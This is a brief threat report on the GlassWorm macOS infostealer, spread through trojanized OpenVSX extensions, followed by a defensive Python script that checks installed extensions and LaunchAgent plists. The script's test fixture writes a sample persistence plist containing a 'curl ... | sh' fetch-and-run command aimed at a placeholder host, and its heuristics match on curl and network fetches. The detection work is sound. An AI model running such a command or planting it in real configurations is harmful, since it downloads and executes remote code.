GlassWorm was distributed by attackers who compromised the oorzc developer account and pushed malicious updates to four OpenVSX extensions with some 22,000 downloads. The macOS-focused infostealer harvests passwords, crypto-wallet data, browser and keychain secrets, and developer credentials, establishes persistence via a LaunchAgent, and exfiltrates data to an attacker-controlled server. #GlassWorm #OpenVSX
Keypoints
- Attackers hijacked the oorzc developer account to publish trojanized updates to four OpenVSX extensions.
- The campaign targets macOS systems; the trojanized extensions had been downloaded approximately 22,000 times in total.
- GlassWorm steals passwords, crypto-wallet data, browser cookies, Apple Keychain items, Apple Notes, developer secrets, and local documents.
- The malware achieves persistence via a LaunchAgent, supports VNC and SOCKS proxying, and retrieves instructions from Solana transaction memos.
- OpenVSX/Eclipse revoked access and removed the malicious releases; affected developers should fully clean systems and rotate all secrets.
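A first triage pass for the two artifacts the keypoints describe, as an added example that is not part of the original report and not a GlassWorm detection signature: it lists installed editor extensions whose manifest names the hijacked oorzc publisher, and flags LaunchAgent plists that combine auto-start with a staged or interpreter-driven payload. The extension roots (~/.vscode and ~/.vscode-oss), the LaunchAgent directories, the heuristics and the sample plists are assumptions for illustration; none of the file names or labels come from the page.

```python
import json
import os
import plistlib
import tempfile
from pathlib import Path

# Assumed extension roots: VS Code uses ~/.vscode, VSCodium and other
# OpenVSX-backed builds typically ~/.vscode-oss. Adjust for your editor.
EXTENSION_ROOTS = ["~/.vscode/extensions", "~/.vscode-oss/extensions"]
# Per-user and system-wide LaunchAgent locations on macOS.
LAUNCH_AGENT_DIRS = ["~/Library/LaunchAgents", "/Library/LaunchAgents"]
# If the launched program is an interpreter, the real payload is in the arguments.
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "node", "perl"}
STAGING_PREFIXES = ("/tmp/", "/var/tmp/", "/private/tmp/", "/var/folders/")


def find_extensions_by_publisher(root, publisher):
    """Return extension folder names under root whose package.json names publisher."""
    hits = []
    root = Path(root).expanduser()
    if not root.is_dir():
        return hits
    for ext_dir in sorted(root.iterdir()):
        manifest = ext_dir / "package.json"
        if not manifest.is_file():
            continue
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        if str(meta.get("publisher", "")).lower() == publisher.lower():
            hits.append(ext_dir.name)
    return hits


def launch_agent_findings(plist_path):
    """List the persistence red flags found in one LaunchAgent plist."""
    try:
        with open(plist_path, "rb") as fh:
            data = plistlib.load(fh)
    except (OSError, ValueError, plistlib.InvalidFileException):
        return ["unparseable plist"]
    args = [str(a) for a in (data.get("ProgramArguments") or [])]
    program = str(data.get("Program") or (args[0] if args else ""))
    joined = " ".join(args)
    reasons = []
    if data.get("RunAtLoad"):
        reasons.append("RunAtLoad")
    if data.get("KeepAlive"):
        reasons.append("KeepAlive")
    if program.startswith(STAGING_PREFIXES) or "/." in program:
        reasons.append("program in temp or hidden path: " + program)
    if os.path.basename(program) in INTERPRETERS:
        reasons.append("interpreter launcher: " + joined)
    if "curl " in joined or "http://" in joined or "https://" in joined:
        reasons.append("network fetch in arguments")
    return reasons


def is_suspicious(reasons):
    """RunAtLoad/KeepAlive alone are normal; any other finding merits a look."""
    return any(r not in ("RunAtLoad", "KeepAlive") for r in reasons)


def audit_launch_agents(dirs=LAUNCH_AGENT_DIRS):
    """Map plist file name -> findings for every agent that is_suspicious()."""
    flagged = {}
    for d in dirs:
        d = Path(d).expanduser()
        if not d.is_dir():
            continue
        for plist in sorted(d.glob("*.plist")):
            reasons = launch_agent_findings(plist)
            if is_suspicious(reasons):
                flagged[plist.name] = reasons
    return flagged


def build_sample_fixture():
    """Constructed sample data (not real GlassWorm artifacts) to exercise the checks."""
    base = Path(tempfile.mkdtemp(prefix="triage-"))
    ext_root = base / "extensions"
    for folder, publisher in (("oorzc.example-ext-0.0.1", "oorzc"),
                              ("othervendor.tool-1.2.3", "othervendor")):
        (ext_root / folder).mkdir(parents=True)
        (ext_root / folder / "package.json").write_text(json.dumps({"publisher": publisher}))
    la_dir = base / "LaunchAgents"
    la_dir.mkdir()
    with open(la_dir / "com.example.updater.plist", "wb") as fh:  # benign-looking agent
        plistlib.dump({"Label": "com.example.updater", "RunAtLoad": True,
                       "Program": "/Applications/Example.app/Contents/MacOS/updater"}, fh)
    with open(la_dir / "com.example.helper.plist", "wb") as fh:  # staged loader pattern
        plistlib.dump({"Label": "com.example.helper", "RunAtLoad": True, "KeepAlive": True,
                       "ProgramArguments": ["/bin/sh", "-c",
                                            "curl -s https://example.invalid/stage | sh"]}, fh)
    return str(ext_root), str(la_dir)


if __name__ == "__main__":
    for root in EXTENSION_ROOTS:
        print(root, find_extensions_by_publisher(root, "oorzc"))
    for name, reasons in audit_launch_agents().items():
        print(name, reasons)
```

A hit from either check is a reason to treat the machine as compromised rather than to simply delete the file: the keypoints above list what the stealer already harvests, so credential rotation has to follow any cleanup. The LaunchAgent heuristics are deliberately generic (auto-start plus an interpreter, a temp-path binary or a network fetch) and will surface legitimate tooling too; review hits by hand.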